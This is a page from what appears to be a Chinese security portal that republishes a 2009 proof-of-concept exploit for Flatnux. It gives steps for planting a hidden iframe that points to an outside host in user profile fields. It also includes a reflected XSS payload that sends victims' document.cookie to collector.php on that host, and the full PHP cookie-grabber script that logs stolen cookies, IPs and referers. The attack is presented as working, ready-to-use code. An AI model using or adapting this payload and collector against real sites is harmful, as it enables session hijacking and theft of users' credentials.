首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC
来源:www.vfcocus.net 作者:Alfons 发布时间:2009-02-03  

/*
  - Flatnux-2009-01-27 XSS/Iframe injection p0c
  + 1] Create acount
  + 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
       - Set iframe in the Job fields      
         (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>)
  + 3] Now m4k3 frieNdship witch Sheep

  Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P
              and Biggest 4 g0rion l0l

  "... droga jest ważniejsza od celu .... :P"
  http://www.wrzuta.pl/audio/iL4UkPk6YK/
  Alfons Luja
*/      
           

<script type="text/javascript">
          path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
          location.href =  path;
</script>


/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
  if(isset($_GET['kuka'])){
     $gethim = $_GET['kuka'];
     $data = "KUKI_GRABER:\n";
     $data.= date("dmY H:i:s")."\n";
     $data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
     $data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
     $data.= "CIACHO: ".$gethim."\n";
     $hnd = fopen("KUKI_FLATNUX.TXT","a");
      if(!hnd) exit(666);
         flock($hnd,LOCK_EX);
         fwrite($hnd,$data);
         flock($hnd,LOCK_UN);
         fclose($hnd);
  }
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Small HTTP Server <= 3.05.85 D
·Elecard AVC HD PLAYER (m3u/xpl
·RealVNC 4.1.2 (vncviewer.exe)
·Php168 v2008 权限提升漏洞
·phpBLASTER 1.0 RC1 (blaster_us
·MS09-001 SMB Dos Poc Exploit
·CMS Mini <= 0.2.2 Remote Comma
·Jieqi cms v1.5 remote code exe
·eVision CMS 2.0 Remote Code Ex
·Google Chrome 1.0.154.46 (Chro
·phpslash <= 0.8.1.1 Remote Cod
·Spider Player 2.3.9.5 (asx Fil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved